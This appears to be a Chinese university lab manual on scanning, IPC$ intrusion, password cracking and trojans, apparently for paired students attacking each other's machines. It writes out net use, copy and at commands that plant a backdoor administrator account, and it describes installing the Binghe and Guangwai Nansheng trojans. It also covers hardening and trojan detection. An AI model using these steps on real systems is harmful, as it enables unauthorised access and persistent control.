入侵检测实验综合文档格式.docx

1、.全连接扫描：扫描主机通过TCP/IP协议的三次握手与目标主机的指定端口建立一次完整的连接。建立连接成功则响应扫描主机的SYN/ACK连接请求，这一响应表明目标端口处于监听（打开）的状态。如果目标端口处于关闭状态，则目标主机会向扫描主机发送RST的响应。.半连接（SYN）扫描：若端口扫描没有完成一个完整的TCP连接，在扫描主机和目标主机的一指定端口建立连接时候只完成了前两次握手，在第三步时，扫描主机中断了本次连接，使连接没有完全建立起来，这样的端口扫描称为半连接扫描，也称为间接扫描。.TCP FIN（秘密）扫描：扫描方法的思想是关闭的端口会用适当的RST来回复FIN数据包。另一方面，打开的端口

2、会忽略对FIN数据包的回复。.综合扫描和安全评估技术工作原理.获得主机系统在网络服务、版本信息、Web应用等相关信息，然后采用模拟攻击的方法，对目标主机系统进行攻击性的安全漏洞扫描，如果模拟攻击成功，则视为漏洞存在。最后根据检测结果向系统管理员提供周密可靠的安全性分析报告。.常见的TCP端口如下：.常见的UDP端口如下：三、实验环境.实验室所有机器安装了Windows操作系统，并组成了一个局域网，并且都安装了SuperScan端口扫描工具和流光Fluxay5综合扫描工具。.每两个学生为一组：互相进行端口扫描和综合扫描实验。四、实验内容和步骤任务一：使用Superscan端口扫描工具并分析结果S

3、uperscan使用简介：选择【Port list setup】，进行端口列表设置分组角色：学生A、学生B互相扫描对方主机。实验步骤：（1）在命令符提示下输入IPCONFIG查询自己的IP地址。（2）在Superscan中的Hostname Lookup栏中，输入同组学生主机的IP地址，可通过单击Lookup按钮获得主机名。（3）设置IP栏、Scan type栏、Scan栏，使其对同组学生主机的所有端口以默认的时间参数进行扫描。（4）根据扫描结果分析主机开放的端口类型和对应的服务程序。（5）通过“控制面板”的“管理工具”中的“服务”配置，尝试关闭或开放目标主机上的部分服务，重新扫描，观察扫描结

4、果的变化。.常见端口的关闭方法：.1、关闭7.9等端口：关闭Simple TCP/IP Service,支持以下TCP/IP 服务：Character Generator, Daytime, Discard, Echo, 以及Quote of the Day。2、关闭80端口：关掉WWW服务。在“服务”中显示名称为“World Wide Web Publishing Service”，通过Internet 信息服务的管理单元提供Web 连接和管理。3、关掉25端口：关闭Simple Mail Transport Protocol （SMTP）服务，它提供的功能是跨网传送电子邮件。4、关掉21端

5、口：关闭FTP Publishing Service,它提供的服务是通过Internet 信息服务的管理单元提供FTP 连接和管理。5、关掉23端口：关闭Telnet服务，它允许远程用户登录到系统并且使用命令行运行控制台程序。6、关掉139端口，139端口是NetBIOSSession端口，用来文件和打印共享，关闭139口听方法是在“网络和拨号连接”中“本地连接”中选取“Internet协议（TCP/IP）”属性，进入“高级TCP/IP设置”“WINS设置”里面有一项“禁用TCP/IP的NETBIOS”，打勾就关闭了139端口。.利用TCP/IP筛选：网上邻居属性-本地连接属性-常规-inte

6、rnet协议（TCP/IP）属性-高级-选项-TCP/IP筛选-属性-TCP端口-只允许139，445，这样其他端口都被关闭了。任务二：使用流光Fluxay5综合扫描工具并分析结果各部份功能：1: 暴力破解的设置区域2：控制台输出3：扫描出来的典型漏洞列表4：扫描或者暴力破解成功的用户帐号5：扫描和暴力破解的速度控制6：扫描和暴力破解时的状态显示7：中止按钮8：探测记录查找选择“文件（F）”“高级扫描向导（W）”可打开高级扫描向导，设置扫描参数。 扫描结束后，流光会自动打开HTML格式的扫描报告，而且还把可利用的主机列在流光界面的最下方，如图1所示。图1单击主机列表中的主机便可以直接对目标主机

7、进行连接操作，如图2所示。图2除了使用“高级扫描向导”配置高级扫描外，还可以在探测菜单中直接选取高级扫描工具设置：（1）开放FTP服务，允许匿名连接。（2）打开流光FLUXAY5工具，使用“高级扫描向导”进行设置，使其能对同组学生主机的全部端口、服务、漏洞、所有用户等进行全面的扫描。（3）仔细观察扫描结果，分析同组学生主机上存在的各种漏洞。（4）根据扫描结果分析FTP漏洞：如结果显示有漏洞，则利用“流光”提供的入侵菜单进行FTP连接，尝试上传或下载文件。（5）根据扫描结果分析IPC$漏洞：IPC是为了让进程间通信而开放的命名管道，可以通过验证用户名和密码获得相应的权限，在远程管理计算机和查看计

8、算机的共享资源时使用。利用IPC$,连接者可以与目标主机建立一个空连接而无需用户名和密码，从而可以得到目标主机上的用户列表，并可能破解用户密码。IPC$相关命令：1.建立和目标的ipc$连接命令：net use 目标IPipc$ “密码”/user:“ADMIN”（管理员账号），如：net use 192.168.27.128ipc$“”/user:administrator2.映射网络驱动器命令（将目标主机的盘映射到本地磁盘）：net use 本地盘符目标IP盘符$，如：net use z:192.168.27.128c$ 3.和目标建立了ipc$后，则可直接用IP加盘符加$访问。比如：co

9、py 文件名IP盘符$路径文件名，如：copy hack.bat192.168.27.128c$也可直接对映射为本地磁盘的网络驱动器操作。4.管理计算机上面的账号命令：net user.查看账号命令：.建立账号命令：net user name passwd/add（net user sysbak123456 /add ：添加用户名为sysback，密码为123456的账号）.删除账号命令：net user name /delete5.管理工作组命令：net localgroup组名用户名/adddelete.如：net localgroupadministrators sysback/add。

10、该命令表示把sysback用户添加到管理员组（administrators）。6.查看目标计算机的系统时间：net time ip7.在远程主机上建立计划任务：at IP TIME COMMAND .at 192.168.27.128 13:45 c:hack.bat（该命令表示在下午13点45分执行目标主机C盘中的hack.bat文件,时间一定要晚于当前远程主机系统时间）8.删除和目标的ipc$连接命令：net use IPipc$ /del9.断开所有IPC$连接：net use * /del10.禁止建立空连接：运行regedit，找到主键HKEY_LOCAL_MACHINE SYSTE

11、M CurrentControlSetControl LSA ，把RestrictAnonymous（DWORD）的键值改为：00000001。11.禁止自动打开默认共享：找到主键HKEY_LOCAL_MACHINESYSTEMCurrentControlSetServicesLanmanServerParameters，把AutoShareServer（DWORD）的键值改为:00000000，如果不存在，就新建一个再改键值。利用破解的用户ADMINISTRATOR对目标主机进行留后门入侵，步骤：1.编写批处理文件hack.bat，文件中包含两个命令：1）建立一个新账号，2）将新账号加入ad

12、ministrators组。2.使用net命令与目标主机建立连接3.将批处理文件hack.back拷贝至目标主机上。4.通过计划任务使目标主机执行hack.bat文件。5.断开所有IPC$连接。6.通过采用新账号与目标主机建立连接来验证账号是否成功建立。7.删除和目标主机的连接。执行安全防护措施：1.目标主机对注册表进行修改：禁止建立空连接，禁止自动打开默认共享2.重新使用net命令与目标主机建立连接，观察结果是否有变化。实验报告要求内容：一、根据任务一的扫描结果，写出主机开放的端口类型和服务。同时写出尝试关闭或开放目标主机上的部分服务后重新扫描的新结果。二、根据任务二的扫描结果，记录被扫描方

13、的用户列表、提供的服务、共享的目录和已经存在的漏洞，分析这些漏洞，写出是系统哪方面设置防范不合理造成的，写出解决措施。三、写出利用破解的用户ADMINISTRATOR对目标主机进行留后门入侵的详细步骤（包括各个步骤对应的使用的命令）【实验指导3】网络入侵攻击与防范实验密码破解与密码破解防护木马的攻击与防范1、 了解密码破解工具的使用方法，掌握安全口令的设置原则；2、.了解常见的木马程序进行远程控制的使用方法，掌握木马传播和运行的机制；3、.掌握防范木马、检测木马以及手动删除木马的方法二、实验环境.Windows操作系统，局域网环境，LC5、“冰河”、“广外男生”木马实验软件。.密码破解实验不分

14、组。.木马实验每两个学生为一组：互相进行攻击或防范。三、实验原理1、.口令破解手段：.（1）弱口令扫描：该方法是最简单的方法，入侵者通过扫描大量主机，从中找出一两个存在弱口令的主机。.（2）密码监听：通过Sniffer（嗅探器）来监听网络中的数据包，从而获得密码，对付明文密码特别有效，如果获取的数据包是加密的，还要涉及到解密算法。.（3）社会（交）工程学：通过欺诈手段或人际关系获取密码。.（4）暴力破解：尝试所有的可能组合口令，所有字、数字和符号等的组合。是密码的终结者，获取密码只是时间问题，分为本地暴力破解和远程暴力破解。.（5）其他方法：例如安装键盘记录程序以及利用具有ES_PASSWOR

15、D属性的Edit控件的特性，获取Edit 框中的“*”内容等等。. 有关系统用户帐号密码口令的破解主要是基于密码匹配的破解方法，最基本的有两个，即穷举法和字典法。穷举法按穷举的规则生成口令字符串，进行遍历尝试；字典法用口令字典中事先定义的常用字符去尝试匹配口令。（2）.木马原理.木马是隐藏在正常程序中的具有特殊功能的恶意代码。它可以随着计算机自动启动并在某一端口监听来自控制端的控制信息。.木马的传统连接技术：一般木马都采用C/S运行模式，即分为两部分：客户端和服务器端木马程序。当服务器端程序在目标计算机上执行后会打开一个默认端口监听，而客户端向服务器端主动提出连接请求。.木马的反弹端口技术：它

16、的特点是使服务器端程序主动发起对外连接请求，再通过一定方式连接至木马的客户端，客户端是被动的连接：两种方式，方式：指明客户端的IP地址和连接端口。.线程插入技术：系统会分配一个虚拟的内存空间地址给每个进程，一切相关的程序操作，都会在这个虚拟的空间中进行。一个进程可以对应一个或多个线程，线程之间可以同步执行，并一般是相互独立的。“线程插入”技术把木马程序作为一个线程，把自身插入其它应用程序的地址空间。从而，达到了彻底隐藏的效果。使用L0phtCrack5破解密码.在Windows操作系统中，用户帐号的安全管理使用了安全帐号管理器SAM（Security Account Manager）的机制，用

17、户和口令经过加密Hash变换后一Hash列表形式存放在SAM文件中。.L0phtCrack通过破解这个SAM文件来获取用户名和密码。它的工作方式是通过尝试每个可能的字母数字组合试图破解密码。.单击文件菜单中的“LC5”向导，设定破解任务。每人对本地机器进行密码破解。步骤：（1）在主机内建立若干用户名，将其密码分别设置为空密码、纯数字组合密码、特定单词字母密码、任意字母组合密码、字母数字混合密码以及特殊符号字母数字混合密码。（2）通过L0phtCrack5文件菜单中的LCS向导，设定从本地机器导入加密口令，分别对本地机器进行“快速口令破解”和“普通口令破解”，观察破解结果（要等一段时间直到破解完

18、全结束）。注意：若采用“复杂口令破解”方式，则需要23小时的时间破解。密码破解的防护.设置密码原则：不小于8字符；包含有大小写英文字母、数字和特殊符号的组合；不包含姓名、用户名、单词、日期以及这几项的组合；定期修改密码。.密码破解的防护措施.Syskey工具可以使用启动密钥来保护SAM文件中的账号信息。.在“开始运行”对话框中输入“Syskey”，启用加密。任务三 练习“冰河”木马的攻击与防范.“冰河”木马采用木马的传统连接技术，包含两个文件：G_Client.exe和G_Server.exe。G_Client.exe是监控端执行程序，可以用于监控远程计算机和配置服务器，G_Server.ex

19、e是被监控端后台监控程序。打开控制端，弹出“冰河”主界面。.文件管理器对文件操作提供了下列鼠标操作功能：1. 文件上传：右键单击欲上传的文件，选择复制，在目的目录中粘贴即可。也可以在目的目录中选择文件上传自，并选定欲上传的文件；2. 文件下载：右键单击欲下载的文件，选择也可以在选定欲下载的文件后选择文件下载至，并选定目的目录及文件名；3. 打开远程或本地文件：选定欲打开的文件,在弹出菜单中选择远程打开或本地打开，对于可执行文件若选择了，可以进一步设置文件的运行方式和运行参数（运行参数可为空）；4. 删除文件或目录：选定欲删除的文件或目录，在弹出菜单中选择删除；5. 新建目录：在弹出菜单中选择新

20、建文件夹并输入目录名即可；6. 文件查找：选定查找路径,在弹出菜单中选择文件查找，并输入文件名即可（支持通配符）；7. 拷贝整个目录（只限于被监控端本机）：选定源目录并复制，选定目的目录并粘贴即可。.单击“命令控制台”按钮，冰河的核心部分就在这里，点击“口令类命令”选择“系统信息及口令”项，点击“系统信息与口令”，得到下图所示的信息命令控制台主要命令:1. 口令类命令: 系统信息及口令、历史口令、击键记录；2. 控制类命令: 捕获屏幕、发送信息、进程管理、窗口管理、鼠标控制、系统控制、其它控制（如锁定注册表等）；3. 网络类命令: 创建共享、删除共享、查看网络信息；4. 文件类命令: 目录增删

21、、文本浏览、文件查找、压缩、复制、移动、上传、下载、删除、打开（对于可执行文件则相当于创建进程）；5. 注册表读写: 注册表键值读写、重命名、主键浏览、读写、重命名；6. 设置类命令: 更换墙纸、更改计算机名、读取服务器端配置、在线修改服务器配置。学生A运行冰河木马程序的客户端，学生B运行服务器端。步骤一，攻击方法：（1）采用IPC$漏洞入侵的方法，将冰河木马服务器端运行程序植入学生B的主机上，并使用计划任务命令使目标主机运行木马服务器端程序G_Server.exe。（2）学生A启动G_Client.exe,利用快捷栏的添加主机按钮，将学生B主机的IP地址添加至主机列表。（3）“确定”后，可以

22、看到主机面上添加了学生B的主机。单击主机名，如连接成功，则会显示服务器端主机上的盘符。（4）尝试使用冰河客户端的控制功能对目标主机进行控制，使用口令类命令查看系统信息及口令；使用控制类命令进行捕获屏幕、发送信息、进程管理、窗口管理、鼠标控制操作；使用文件类命令进行添加目录，复制目录等操作。步骤二，防范方法：（1）学生B的主机速度明显变慢，为了删除“冰河”木马，可以选择用杀毒软件的方式或是手动删除的方式，这里我们采用手动删除的方式。（2）在“开始”的“运行”里面输入regedit，打开Windows注册表编辑器。依次打开子键目录HKEY_LOCAL_MACHINESOFTWAREMicrosof

23、tWindowsCurrentVersionRun，删除默认键值C:WINNTSystem32kernel32.exe。（3）进入C:WINNTSystem32目录，找到“冰河”木马的两个可执行文件Kernel32.exe和Sysexplr.exe文件删除。（4）“冰河”木马将txt文件的缺省打开方式由notepad.exe改为木马的启动程序，需要恢复txt文件关联功能，将注册表的HKEY_CLASSES_ROOTtxtfileshellopencommand下的默认值，由中木马后的C:WindowsSystemSysexplr.exe%1改为C:Windowsnotepad.exe%1。（5

24、）学生A尝试再次用木马控制段连接学生B主机，观察结果（6）互换角色，重做实验。任务四 练习“广外男生”木马的攻击与检测.“广外男生”采用了“端口反弹”和“线程插入”技术，使用前必须正确配置客户端和服务器端，并生成服务器端程序植入远程主机。客户端设置服务器端设置生成文件的界面学生A运行木马程序的客户端，学生B运行服务器端。攻击方法：（1）采用IPC$漏洞入侵的方法，将木马服务器端运行程序植入学生B的主机上，并使用计划任务命令使目标主机运行木马服务器端程序hacktest.exe。（2）学生A启动广外男生客户端程序,等待一段时间后，界面上出现学生B主机IP，则连接成功。（3）尝试使用客户端的控制功

25、能对目标主机进行控制，使用“文件共享”、“远程注册表”、“进程与服务”以及“远程桌面”等功能。说明：使用了“线程插入”技术，在任务管理器中发现不了。这里使用fport和tlist两大工具。Fport可以查看某个具体端口被哪个进程所占用，并能查看PID。Tlist可以查看进程中有哪些动态链接库正在运行，对于检测插入在某个正常的进程中的线程十分有用。（1）运行命令“netstat an”查看网络端口占用状态，记住已建立的可疑IP地址与本机的连接所使用的连接端口号。如从结果：“TCP 210.43.99.24：1404 21被控制端（服务器端）检测“广外男生”木马的方法：（1）运行命令“netsta

26、tan”查看网络端口占用状态，记住已建立的可疑IP地址与本机的连接所使用的连接端口号。1404 210.43.99.212：90 ESTABLISHED”，记住可以连接中本机用于连接的端口号为1404。（2）在有fport.exe的目录中运行“fport”（在命令行中输入命令），可以查到与连接的端口号对应的进程和进程的PID号。如结果“848 Explorer - 1404 TCP C:WINNTExplorer.EXE”，可查出进程Explorer.exe占用端口1404，此进程的PID号为848，此进程即为木马插入进程。（3）在有tlist.exe的目录中在命令行中运行“tlist848”（PID号），查看进程号为848的explorer.exe进程中运行的动态链接库。在众多链接库文件中，找到木马的dll文件gwboydll.dll（也可能改名为其它可疑文件） 。（4）在命令行中输入命令“tlistm gwboydll.dll”查看木马是否还插入其它进程。一、简单阐述实验原理二、写出任务一的实验步骤和不同破解方式的破解结果三、写出任务四中被